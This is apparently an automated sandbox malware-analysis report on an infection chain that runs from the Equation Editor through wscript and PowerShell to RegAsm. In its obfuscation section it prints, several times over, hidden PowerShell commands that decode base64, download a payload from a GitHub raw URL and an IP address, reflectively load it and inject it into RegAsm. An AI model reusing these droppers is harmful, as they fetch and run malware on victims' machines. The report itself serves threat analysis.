                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.369396970.0000000000279000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A8F4F push eax; retf 2_2_005A8F61
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B7945 push edx; ret 2_2_005B7947
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B7778 push edx; ret 2_2_005B777B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B627C push ecx; ret 2_2_005B629F
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B7770 push edx; ret 2_2_005B7773
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B776A push edx; ret 2_2_005B776B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B6264 push ecx; ret 2_2_005B6267
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B793D push edx; ret 2_2_005B793F
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B6529 push ecx; ret 2_2_005B652B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A01F4 push eax; retf 2_2_005A01F5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B62AB push ecx; ret 2_2_005B62AF
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B62A3 push ecx; ret 2_2_005B62A7
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002521C8 push ebx; iretd 8_2_002521EA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002525E1 push ebx; retf 8_2_002525EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457186 push ecx; ret 9_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045E55D push esi; ret 9_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457AA8 push eax; ret 9_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434EB6 push ecx; ret 9_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002806 push ecx; ret 9_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00451D34 push eax; ret 12_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414039 push ecx; ret 13_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
